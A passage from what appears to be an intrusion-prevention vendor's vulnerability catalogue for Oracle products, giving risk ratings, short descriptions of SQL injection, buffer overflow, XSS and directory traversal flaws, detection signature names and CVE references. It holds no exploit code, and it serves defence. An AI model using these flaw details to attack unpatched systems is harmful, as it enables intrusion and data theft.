TNS_CS-Oracle-Database-SQL-Compiler-Access-Control-Security-Bypass
References:
CVE-2007-3855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3855
BID-24887
http://www.securityfocus.com/bid/24887
Back to top

Oracle-Database-Sys-Pbsde-Init-Procedure-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the 'sys.pbsde.init' stored procedure in Oracle database
Risk: High
First detected in: sgpkg-ips-58-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle 9i; Oracle 10g
Type: Buffer Overflow
Description: The default installation of Oracle database contains some stored procedures. One of these procedures is 'sys.pdsde.init'. Although this procedure is not accessible to regular database users, they may still attempt to invoke it. This procedure has a buffer overflow vulnerability in the processing of its parameters. If the third parameter to this procedure is longer than 110 bytes, a stack buffer overflow occurs. A remote attacker is able to exploit this vulnerability to execute arbitrary code on the victim server.
Situation: Generic_Oracle-Database-Sys-Pbsde-Init-Procedure-Buffer-Overflow
TNS_Oracle-Database-Sys-Pbsde-Init-Procedure-Buffer-Overflow
References:
CVE-2005-0873
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0873
BID-15134
http://www.securityfocus.com/bid/15134
Back to top

Oracle-Database-SYS.KUPW-WORKER-Package-MAIN-Procedure-SQL-Injection

About this vulnerability: SQL injection vulnerability in the Oracle Database Server SYS.KUPW$WORKER package
Risk: High
First detected in: sgpkg-ips-88-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Database
Type: SQL Injection
Description: Oracle Database Server SYS.KUPW$WORKER package has an SQL injection vulnerability. By calling the vulnerable SYS.KUPW$WORKER.MAIN procedure, a remote attacker with limited privileges can inject arbitary SQL statements that are executed with the context of the database administrator, SYSDBA.
Situation: SMB-TCP_Oracle-Database-SYS.KUPW-WORKER-Package-MAIN-Procedure-SQL-Injection
Generic_Oracle-Database-SYS.KUPW-WORKER-Package-MAIN-Procedure-SQL-Injection
TNS_CS_Oracle-Database-SYS.KUPW-WORKER-Package-MAIN-Procedure-SQL-Injection
References:
CVE-2006-3698
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3698
BID-19054
http://www.securityfocus.com/bid/19054
Back to top

Oracle-Database-Sys.lt.findricset-SQL-Injection

About this vulnerability: A vulnerability in Oracle Database Server
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Database Server
Type: Malfunction
Description: There exists a SQL injection vulnerability in Oracle Database.
Situation: TNS_CS-Oracle-Database-Sys.lt.findricset-SQL-Injection
References:
CVE-2007-5511
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5511
BID-26098
http://www.securityfocus.com/bid/26098
OSVDB-40079
http://www.osvdb.org/40079
Back to top

Oracle-Database-SYS.OLAPIMPL_T-Package-ODCITABLESTART-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Oracle Database
Risk: High
First detected in: sgpkg-ips-204-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Database
Type: Buffer Overflow
Description: There is a buffer overflow in the Oracle Database Server. The vulnerability is due to improper input validation of user-provided parameters sent to a procedure in the SYS.OLAPIMPL_T package. A remote authenticated attacker can exploit this vulnerability by sending a specially crafted SQL statement to the target server, potentially causing database corruption or arbitrary code injection and execution with the privileges of the affected process.
Situation: Generic_CS-Oracle-Database-SYS.OLAPIMPL-T-Package-ODCITABLESTART-Buffer-Overflow
TNS_CS-Oracle-Database-SYS.OLAPIMPL-T-Package-ODCITABLESTART-Buffer-Overflow
References:
CVE-2008-3974
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3974
BID-33177
http://www.securityfocus.com/bid/33177
OSVDB-51347
http://www.osvdb.org/51347
Back to top

Oracle-Database-TNS-Listener-Service-Registration-Lack-Of-Authentication

About this vulnerability: A vulnerability in Oracle Database 10g Release 2
Risk: Moderate
First detected in: sgpkg-ips-453-4333
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle 10g; Oracle 11g
Type: Malfunction
Description: A vulnerability has been discovered in the TNS Listener component of Oracle's database. The vulnerability is due to a lack of authentication when accepting registrations of database server instances. A remote attacker could use this vulnerability to redirect legitimate database queries to a rogue server or to perform a man-in-the-middle attack to hijack established connections. As a result, the attacker could gain full access to the database with the privileges of the user whose connection was hijacked.
Situation: Generic_CS-Oracle-Database-TNS-Listener-Registration-Lack-Of-Authentication
TNS_Oracle-Database-TNS-Listener-Service-Registration-Lack-Of-Authentication
References:
CVE-2012-1675
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1675
BID-53308
http://www.securityfocus.com/bid/53308
Back to top

Oracle-Database-Trigger-Mdsys.sdo_Topo_Drop_ftbl-SQL-Injection-Vulnerability

About this vulnerability: A vulnerability in Oracle Oracle Database
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle 10g
Type: SQL Injection
Description: There is an SQL injection vulnerability in Oracle Database Server product. The vulnerability exists due to insufficient validation of arguments supplied to trigger MDSYS.SDO_TOPO_DROP_FTBL. A remote attacker with valid user credentials may leverage this vulnerability to inject and execute arbitrary SQL code within the security context of the database system administrator. Exploitation of this vulnerability may result in privilege escalation allowing an attacker with limited privileges to execute statements with the privileges of the database system administrator. The exact behaviour of the target system is dependent on the intention of the attacker. It may be possible for an attacker to affect the target host beyond the confines of the database which would allow manipulation of the host system.
Situation: TNS_CS-Oracle-Database-Mdsys.sdo_Topo_Drop_ftbl-SQL-Injection-Vulnerability
References:
CVE-2008-3979
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3979
BID-33177
http://www.securityfocus.com/bid/33177
OSVDB-51354
http://www.osvdb.org/51354
Back to top

Oracle-Database-XDB-Pitrig-dropmetadata-Procedure-BOF

About this vulnerability: A buffer overflow vulnerability in Oracle Database Server
Risk: High
First detected in: sgpkg-ips-130-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle 10g
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Oracle Database Server. The vulnerability exists due to insufficient validation of the arguments supplied to procedure PITRIG_DROPMETADATA in XDB.XDB_PITRIG_PKG package. A remote attacker with valid user credentials may leverage this vulnerability to execute arbitrary code within the security context of the affected service.
Situation: Generic_CS-Oracle-Database-XDB-Pitrig-dropmetadata-Procedure-BOF
TNS_CS-Oracle-Database-XDB-Pitrig-dropmetadata-Procedure-BOF
References:
CVE-2007-4517
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4517
BID-26374
http://www.securityfocus.com/bid/26374
Back to top

Oracle-Demantra-Demand-Management-File-Download

About this vulnerability: An Oracle Demantra Demand Management File Download vulnerability.
Risk: High
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-1640-5242
Platform: Generic
Software: Oracle Demantra Demand Management
Type: Configuration Error
Description: A vulnerability in Oracle Demantra Demand Management, versions 12.2.0, 12.2.1, and 12.2.2, which allows remote attackers to perform directory traversal and download arbitrary files due to a broken authentication filter.
Situation: HTTP_CSU-Oracle-Demantra-Demand-Management-Information-Leak
References:
CVE-2013-5880
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5880
BID-64836
http://www.securityfocus.com/bid/64836
OSVDB-102095
http://www.osvdb.org/102095
Back to top

Oracle-Demantra-Demand-Management-Information-Leak

About this vulnerability: A Oracle Demantra Demand Management Information Leak vulnerability.
Risk: High
First detected in: sgpkg-ips-700-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Demantra Demand Management
Type: Directory Traversal
Description: A vulnerability in the Oracle Demantra Demand Management component, versions 7.2.0.3 SQL-Server, 7.3.0, 7.3.1, 12.2.1, 12.2.2, 12.2.3, allows remote attackers to obtain sensitive information about the system. This covers both CVE-2013-5795 and CVE-2013-5877.
Situation: HTTP_CSU-Oracle-Demantra-Demand-Management-Information-Leak
References:
CVE-2013-5795
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5795
BID-64846
http://www.securityfocus.com/bid/64846
OSVDB-102096
http://www.osvdb.org/102096
Back to top

Oracle-Document-Capture-ActiveX-Control-SetAnnotationFont-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Document Capture
Risk: High
First detected in: sgpkg-ips-527-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Document Capture
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in the BlackIceDevMode.ocx ActiveX control included with Oracle Document Capture. The vulnerability is due to improper bounds checking while parsing the arguments passed to the SetAnnotationFont() method. Remote attackers can exploit this vulnerability by enticing target users to visit a malicious web page. Successful exploitation could lead to injection and execution of arbitrary code on the target system with the privileges of the logged in user.
Situation: File-Text_Oracle-Document-Capture-ActiveX-Control-SetAnnotationFont-Usage
References:
CVE-2013-1516
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1516
OSVDB-92387
http://www.osvdb.org/92387
Back to top

Oracle-Document-Capture-ActiveX-Control-WriteJPG-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Document Capture
Risk: High
First detected in: sgpkg-ips-374-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Oracle Document Capture
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in NCSECWLib ActiveX control component included with Oracle Document Capture. The vulnerability is due to a improper bounds ochecking of arguments within the object's WriteJPG method. Remote attackers can exploit this vulnerability by enticing target users to visit a malicious web page. Successful exploitation could lead to injection and execution of arbitrary code on the target system with the privileges of the logged in user.
Situation: HTTP_SS-Oracle-Document-Capture-ActiveX-Control-WriteJPG-Buffer-Overflow
File-Text_Oracle-Document-Capture-ActiveX-Control-WriteJPG-Buffer-Overflow
References:
CVE-2010-3599
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3599
BID-45856
http://www.securityfocus.com/bid/45856
Back to top

Oracle-Document-Capture-EasyMail-ActiveX-Control

About this vulnerability: A vulnerability in Oracle Document Capture
Risk: Moderate
First detected in: sgpkg-ips-375-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Document Capture
Type: Malfunction
Description: An information disclosure vulnerability exists in the EasyMail ActiveX control included with Oracle Document Capture. The vulnerability is due to improper validation of user input within the ImportBodyTextEx(), ImportBodyText() and ImportBodyTextAlternative() methods, allowing an attacker to read any file in the affected system. Remote unauthenticated attackers can exploit this vulnerability by enticing target users to visit a malicious web page.
Situation: HTTP_SS-Oracle-Document-Capture-EasyMail-ActiveX-Control
File-Text_Oracle-Document-Capture-EasyMail-ActiveX-Control
References:
CVE-2010-3595
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3595
BID-45849
http://www.securityfocus.com/bid/45849
Back to top

Oracle-Document-Capture-EasyMail-IMAP4-LicenseKey-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Oracle Document Capture integrated with the Oracle Imaging and Process Management and Oracle Universal Content Management products
Risk: Moderate
First detected in: sgpkg-ips-268-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Oracle Document Capture; QuikSoft Corp EasyMail
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Oracle Document Capture integrated with the Oracle Imaging and Process Management and Oracle Universal Content Management products.
Situation: HTTP_SS-Oracle-Document-Capture-EasyMail-IMAP4-LicenseKey-Buffer-Overflow
HTTP_SS-Oracle-Document-Capture-EasyMail-IMAP4-LicenseKey-BOF-Exploit
File-Text_Oracle-Document-Capture-EasyMail-IMAP4-LicenseKey-Buffer-Overflow
File-Text_Oracle-Document-Capture-EasyMail-IMAP4-LicenseKey-BOF-Exploit
Back to top

Oracle-Document-Capture-EasyMail-SMTP-Addattachment-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Document Capture
Risk: High
First detected in: sgpkg-ips-381-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Oracle Document Capture; Oracle Imaging and Process Management; Oracle Universal Content Management
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in Oracle Document Capture, which is integrated with Oracle Imaging and Process Management and Oracle Universal Content Management products. The vulnerability is due to a boundary error that can occur when parsing a crafted argument passed to the AddAttachment method of the EasyMail SMTP ActiveX component. Remote attackers can exploit this vulnerability by enticing target users to visit a malicious web page. Successful exploitation could lead to arbitrary code execution on the target system.
Situation: HTTP_SS-Oracle-Document-Capture-EasyMail-SMTP-Addattachment-Buffer-Overflow
File-Text_Oracle-Document-Capture-EasyMail-SMTP-Addattachment-Buffer-Overflow
References:
BID-36440
http://www.securityfocus.com/bid/36440
Back to top

Oracle-Document-Capture-EasyMail-SMTP-SubmitToExpress-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Document Capture
Risk: High
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Oracle Document Capture
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in Oracle Document Capture.
Situation: HTTP_SS-Oracle-Document-Capture-EasyMail-SMTP-SubmitToExpress-Buffer-Overflow
File-Text_Oracle-Document-Capture-EasyMail-SMTP-SubmitToExpress-Buffer-Overflow
References:
CVE-2007-4607
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4607
BID-25467
http://www.securityfocus.com/bid/25467
OSVDB-38335
http://www.osvdb.org/38335
Back to top

Oracle-E-Business-Suite-Advanced-Outbound-Telephony-Calendar-XSS

About this vulnerability: A vulnerability in Oracle E-Business Suite
Risk: High
First detected in: sgpkg-ips-1255-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle E-Business Suite
Type: Input Validation
Description: Multiple cross-site scripting vulnerabilities have been reported in the Calendar module of the Advanced Outbound Telephony component in Oracle E-Business Suite. The vulnerability is due to use of untrusted user input from requests when constructing Javascript in a JSP. A remote attacker can exploit this vulnerability by enticing a target user into clicking on a crafted link. Successful exploitation could result in the execution of script code in security context of the target user's browser.
Situation: HTTP_CRL-Oracle-E-Business-Suite-Advanced-Outbound-Telephony-Calendar-XSS
References:
CVE-2020-2852
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2852
Back to top

Oracle-E-Business-Suite-Advanced-Outbound-Telephony-CVE-2020-2854-XSS

About this vulnerability: A vulnerability in Oracle E-Business Suite
Risk: High
First detected in: sgpkg-ips-1260-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle E-Business Suite
Type: Input Validation
Description: A cross-site scripting vulnerability has been reported in the User Interface of the Advanced Outbound Telephony component in Oracle E-Business Suite. The vulnerability is due to use of untrusted user input from requests when constructing HTML output in a JSP. A remote attacker can exploit this vulnerability by enticing a target user into clicking on a crafted link. Successful exploitation could result in the execution of script code in security context of the target user's browser.
Situation: HTTP_CRL-Oracle-E-Business-Suite-Advanced-Outbound-Telephony-CVE-2020-2854-XSS
References:
CVE-2020-2854
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2854
Back to top

Oracle-E-Business-Suite-Advanced-Outbound-Telephony-CVE-2020-2856-XSS

About this vulnerability: A vulnerability in Oracle E-Business Suite
Risk: Moderate
First detected in: sgpkg-ips-1260-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle E-Business Suite
Type: Input Validation
Description: Improper handling of user input causes a cross-site scripting vulnerability in Oracle E-Business Suite. A successful exploit may allow an attacker to run arbitrary scripts in a user's browser.
Situation: HTTP_CSU-Oracle-E-Business-Suite-Advanced-Outbound-Telephony-CVE-2020-2856-Cross-Site-Scripting
References:
CVE-2020-2856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2856
Back to top

Oracle-E-Business-Suite-Advanced-Outbound-Telephony-CVE-2020-2871-XSS

About this vulnerability: A vulnerability in Oracle E-Business Suite
Risk: High
First detected in: sgpkg-ips-1258-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle E-Business Suite
Type: Input Validation
Description: A cross-site scripting vulnerability has been reported in the User Interface of the Advanced Outbound Telephony component in Oracle E-Business Suite. The vulnerability is due to use of untrusted user input from requests when constructing HTML output in a JSP. A remote attacker can exploit this vulnerability by enticing a target user into clicking on a crafted link. Successful exploitation could result in the execution of script code in security context of the target user's browser.
Situation: HTTP_CRL-Oracle-E-Business-Suite-Advanced-Outbound-Telephony-CVE-2020-2871-XSS
References:
CVE-2020-2871
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2871
Back to top

Oracle-E-Business-Suite-Arbitrary-File-Upload-CVE-2022-21587

About this vulnerability: A vulnerability in Oracle E-Business Suite
Risk: High
First detected in: sgpkg-ips-1555-5242
Last changed: sgpkg-ips-1557-5242
Platform: Generic
Software: Oracle E-Business Suite
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in the Upload component of the Web Applications Desktop Integrator application of Oracle E-Business Suite. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation results in the execution of arbitrary code in the security context of the service.
Situation: File-TextId_Oracle-E-Business-Suite-Arbitrary-File-Upload-CVE-2022-21587
References:
CVE-2022-21587
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21587
Back to top

Oracle-E-Business-Suite-Biccfgd2.jsp-SQL-Injection-CVE-2016-0545

About this vulnerability: A vulnerability in Oracle E-Business Suite
Risk: Moderate
First detected in: sgpkg-ips-1795-5242
Last changed: sgpkg-ips-1795-5242
Platform: Generic
Software: Oracle E-Business Suite
Type: SQL Injection
Description: A SQL injection vulnerability exists in the Oracle Customer Intellect component of the Oracle E-Business Suite.
Situation: HTTP_CRL-Oracle-E-Business-Suite-Biccfgd2.jsp-SQL-Injection-CVE-2016-0545
References:
CVE-2016-0545
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0545
Back to top

Oracle-E-Business-Suite-Common-Applications-Calendar-CVE-2021-2114-XSS

About this vulnerability: A vulnerability in Oracle E-Business Suite
Risk: High
First detected in: sgpkg-ips-1329-5242
Last changed: sgpkg-ips-1329-5242
Platform: Generic
Software: Oracle E-Business Suite
Type: Input Validation
Description: A reflected cross-site scripting vulnerability has been reported in the Common Applications Calendar component in Oracle E-Business Suite. The vulnerability is due to the use of untrusted user input from requests when constructing HTML output in a JSP. A remote attacker can exploit this vulnerability by enticing a target user into clicking on a crafted link. Successful exploitation could result in the execution of script code in security context of the target user's browser.
Situation: HTTP_CRL-Oracle-E-Business-Suite-Common-Applications-Calendar-CVE-2021-2114-XSS
References:
CVE-2021-2114
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2114
Back to top

Oracle-E-Business-Suite-Desktop-Integrator-Bnedecoder-Dir-Traversal

About this vulnerability: A vulnerability in Oracle E-Business Suite
Risk: Moderate
First detected in: sgpkg-ips-1557-5242
Last changed: sgpkg-ips-1557-5242
Platform: Generic
Software: Oracle E-Business Suite
Type: Directory Traversal
Description: Improper validation of data input causes a directory traversal vulnerability in Oracle E-Business Suite. A successful exploit may allow an attacker to execute remote code on the target system.
Situation: HTTP_CS-Oracle-E-Business-Suite-Web-Applications-Desktop-Integrator-Bnedecoder-Directory-Traversal
References:
CVE-2022-39428
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39428
Back to top

Oracle-E-Business-Suite-General-Ledger-SQL-Injection

About this vulnerability: A vulnerability in Oracle E-Business Suite
Risk: Moderate
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle E-Business Suite
Type: Malfunction
Description: Insufficient access controls and improper sanitization of user input cause an SQL injection vulnerability in the Oracle E-Business Suite. A successful attack allows an attacker to execute arbitrary SQL on the target.
Situation: HTTP_CS-Oracle-E-Business-Suite-General-Ledger-SQL-Injection
References:
CVE-2019-2638
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2638
Back to top

Oracle-E-Business-Suite-Human-Resources-CVE-2020-2956-SQL-Injection

About this vulnerability: A vulnerability in Oracle E-Business Suite
Risk: Moderate
First detected in: sgpkg-ips-1243-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle E-Business Suite
Type: Input Validation
Description: The Position Hierarchy Viewer module of the Human Resources component in Oracle E-Business Suite does not correctly validate inputs, which causes an SQL injection vulnerability that can be exploited to be able to execute arbitrary SQL with the privileges of the database user.
Situation: File-MPEG_Oracle-E-Business-Suite-Human-Resources-CVE-2020-2956-SQL-Injection
References:
CVE-2020-2956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2956
Back to top

Oracle-E-Business-Suite-Human-Resources-SQL-Injection

About this vulnerability: A vulnerability in Oracle E-Business Suite Human Resources
Risk: High
First detected in: sgpkg-ips-1224-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle E-Business Suite
Type: SQL Injection
Description: There exists a vulnerability in the Human Resources module in Oracle E-Business Suite, versions 12.1.1-12.1.3 and 12.2.3-12.2.9, which allows remote attackers to execute arbitrary SQL commands due to insufficient access control.
Situation: HTTP_CRL-Oracle-E-Business-Suite-Human-Resources-SQL-Injection
References:
CVE-2020-2587
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2587
Back to top

Oracle-E-Business-Suite-Istore-Personal-Information-Cross-Site-Scripting

About this vulnerability: A vulnerability in Oracle E-Business Suite
Risk: Moderate
First detected in: sgpkg-ips-1346-5242
Last changed: sgpkg-ips-1346-5242
Platform: Generic
Software: Oracle E-Business Suite
Type: Input Validation
Description: There exists a reflected cross-site scripting vulnerability in the iStore component in Oracle E-Business Suite. Successful exploitation could lead in the execution of javascript code in the target user's browser.
Situation: HTTP_CRL-Oracle-E-Business-Suite-Istore-Personal-Information-Cross-Site-Scripting
References:
CVE-2021-2182
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2182
Back to top

Oracle-E-Business-Suite-Knowledge-Management-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Oracle E-Business Suite
Risk: Moderate
First detected in: sgpkg-ips-1373-5242
Last changed: sgpkg-ips-1373-5242
Platform: Generic
Software: Oracle E-Business Suite
Type: Input Validation
Description: Improper handling of user input causes a stored cross-site scripting vulnerability in Oracle E-Business Suite Knowledge Management. A successful exploit allows an attacker to execute arbitrary code in a user's browser.
Situation: HTTP_CRL-Oracle-E-Business-Suite-Knowledge-Management-Stored-Cross-Site-Scripting
References:
CVE-2021-2198
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2198
Back to top

Oracle-E-Business-Suite-Sales-Offline-CVE-2021-2189-Infinite-Loop

About this vulnerability: A vulnerability in Oracle E-Business Suite
Risk: Moderate
First detected in: sgpkg-ips-1363-5242
Last changed: sgpkg-ips-1363-5242
Platform: Generic
Software: Oracle E-Business Suite
Type: Infinite Loop
Description: There exists an infinite loop vulnerability in the Sales Offline component of Oracle E-Business Suite. Successful exploitation could lead in denial of service conditions.
Situation: HTTP_CSU-Oracle-E-Business-Suite-Sales-Offline-CVE-2021-2189-Infinite-Loop
References:
CVE-2021-2189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2189
Back to top

Oracle-E-Business-Suite-Sales-Offline-CVE-2021-2190-Infinite-Loop

About this vulnerability: A vulnerability in Oracle E-Business Suite
Risk: High
First detected in: sgpkg-ips-1364-5242
Last changed: sgpkg-ips-1364-5242
Platform: Generic
Software: Oracle E-Business Suite
Type: Infinite Loop
Description: An infinite loop vulnerability has been reported in the Sales Offline component of Oracle E-Business Suite. The vulnerability is due to improper handling of requests by the authentication component of Sales Offline. An unauthenticated, remote attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation causes an infinite loop, consuming large amounts of CPU resources and possibly leading to denial of service conditions on the target server.
Situation: HTTP_CS-Oracle-E-Business-Suite-Sales-Offline-CVE-2021-2190-Infinite-Loop
References:
CVE-2021-2190
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2190
Back to top

Oracle-E-Business-Suite-SQL-Injection-CVE-2020-2882

About this vulnerability: A vulnerability in Oracle E-Business Suite
Risk: High
First detected in: sgpkg-ips-1697-5242
Last changed: sgpkg-ips-1697-5242
Platform: Generic
Software: Oracle E-Business Suite
Type: Input Validation
Description: An SQL execution vulnerability has been reported in the Human Resources component of Oracle E-Business Suite. Successful exploitation results in the execution of arbitrary SQL statements with the privileges of the APPS database user.
Situation: HTTP_CS-Oracle-E-Business-Suite-SQL-Injection-CVE-2020-2882
References:
CVE-2020-2882
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2882
Back to top

Oracle-E-Business-Suite-Work-In-Process-SQL-Injection

About this vulnerability: A vulnerability in Oracle E-Business Suite
Risk: High
First detected in: sgpkg-ips-1240-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle E-Business Suite
Type: Input Validation
Description: An SQL execution vulnerability has been reported in the Work In Process component of Oracle E-Business Suite. The vulnerability is due to a combination of insufficient access controls and using untrusted user input from serialized Java objects to build a SQL query string. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation results in the execution of arbitrary SQL statements with the privileges of the APPS database user.
Situation: File-Binary_Oracle-E-Business-Suite-Work-In-Process-SQL-Injection
References:
CVE-2019-2633
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2633
Back to top

Oracle-Endeca-Idi-Etl-Server-Uploadfilecontent-Directory-Traversal

About this vulnerability: A vulnerability in Oracle Endeca Information Discovery Integrator ETL Server
Risk: High
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Endeca Server
Type: Directory Traversal
Description: There exists a directory traversal vulnerability in Oracle Endeca Information Discovery Integrator ETL Server. A successful exploitation can lead to arbitrary code execution.
Situation: HTTP_CS-Oracle-Endeca-Idi-Etl-Server-Uploadfilecontent-Directory-Traversal
References:
CVE-2015-2602
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2602
Back to top

Oracle-Endeca-Information-Discovery-Integrator-Etl-Server-Directory-Traversal

About this vulnerability: A vulnerability in Oracle Endeca Information Discovery Integrator ETL Server
Risk: Moderate
First detected in: sgpkg-ips-674-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Endeca Server
Type: Directory Traversal
Description: A directory traversal vulnerability exists in Oracle Endeca Information Discovery Integrator ETL Server. The vulnerability is due to insufficient input validation while processing SOAP requests to the RenameFile operation. By sending crafted SOAP requests to the target system, a remote authenticated attacker can leverage this vulnerability to rename and move arbitrary files on a target system with System privileges. This can further lead to information disclosure and eventually arbitrary code execution.
Situation: HTTP_CS-Oracle-Endeca-Information-Discovery-Integrator-Etl-Server-Directory-Traversal
References:
CVE-2015-2606
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2606
Back to top

Oracle-Endeca-Information-Discovery-Integrator-Etl-Server-Movefile-Vulnerability

About this vulnerability: A vulnerability in Oracle Endeca Information Discovery Integrator ETL Server
Risk: Moderate
First detected in: sgpkg-ips-676-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Endeca Server
Type: Directory Traversal
Description: A directory traversal vulnerability exists in Oracle Endeca Information Discovery Integrator ETL Server. The vulnerability is due to insufficient input validation while processing SOAP requests to the MoveFile operation. By sending crafted SOAP requests to the target system, a remote authenticated attacker can leverage this vulnerability to move arbitrary files on a target system with System privileges. This can further lead to information disclosure and eventually arbitrary code execution.
Situation: HTTP_CS-Oracle-Endeca-Information-Discovery-Integrator-Etl-Server-Movefile-Vulnerability
References:
CVE-2015-2605
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2605
Back to top

Oracle-Endeca-Server-Createdatastore-Remote-Command-Execution

About this vulnerability: A vulnerability in Oracle Endeca Server
Risk: High
First detected in: sgpkg-ips-541-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Oracle Endeca Server
Type: Malfunction
Description: A command execution vulnerability exists in Oracle Endeca Server. The vulnerability is due to the controlSoapBinding web service exposing the createDataStore method which contains a flaw that allows for the injection of arbitrary commands. A remote, unauthenticated attacker could exploit this vulnerability by sending a specially crafted request to the affected server. Successful exploitation could result in arbitrary command execution with elevated privileges.
Situation: HTTP_CS-Oracle-Endeca-Server-Createdatastore-Remote-Command-Execution
References:
CVE-2013-3763
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3763
OSVDB-95269
http://www.osvdb.org/95269
Back to top

Oracle-Endeca-Server-Directory-Traversal-CVE-2015-2604

About this vulnerability: A vulnerability in Oracle Endeca Information Discovery Integrator ETL Server
Risk: Low
First detected in: sgpkg-ips-676-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Endeca Server
Type: Directory Traversal
Description: There is a directory traversal vulnerability in Oracle Endeca Information Discovery Integrator ETL Server which can be exploited by sending a malicious SOAP request.
Situation: HTTP_CS-Oracle-Endeca-Server-Directory-Traversal-CVE-2015-2604
References:
CVE-2015-2604
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2604
Back to top

Oracle-Event-Processing-Fileuploadservlet-Directory-Traversal

About this vulnerability: A vulnerability in Oracle Event Processing
Risk: High
First detected in: sgpkg-ips-598-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Oracle Event Processing
Type: Directory Traversal
Description: A code execution vulnerability exists in Oracle Event Processing. The vulnerability is due to a directory traversal within the FileUploadServlet servlet. A remote unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted HTTP request. This may lead to code execution in the context of the affected service.
Situation: HTTP_CS-Oracle-Event-Processing-Fileuploadservlet-Directory-Traversal
References:
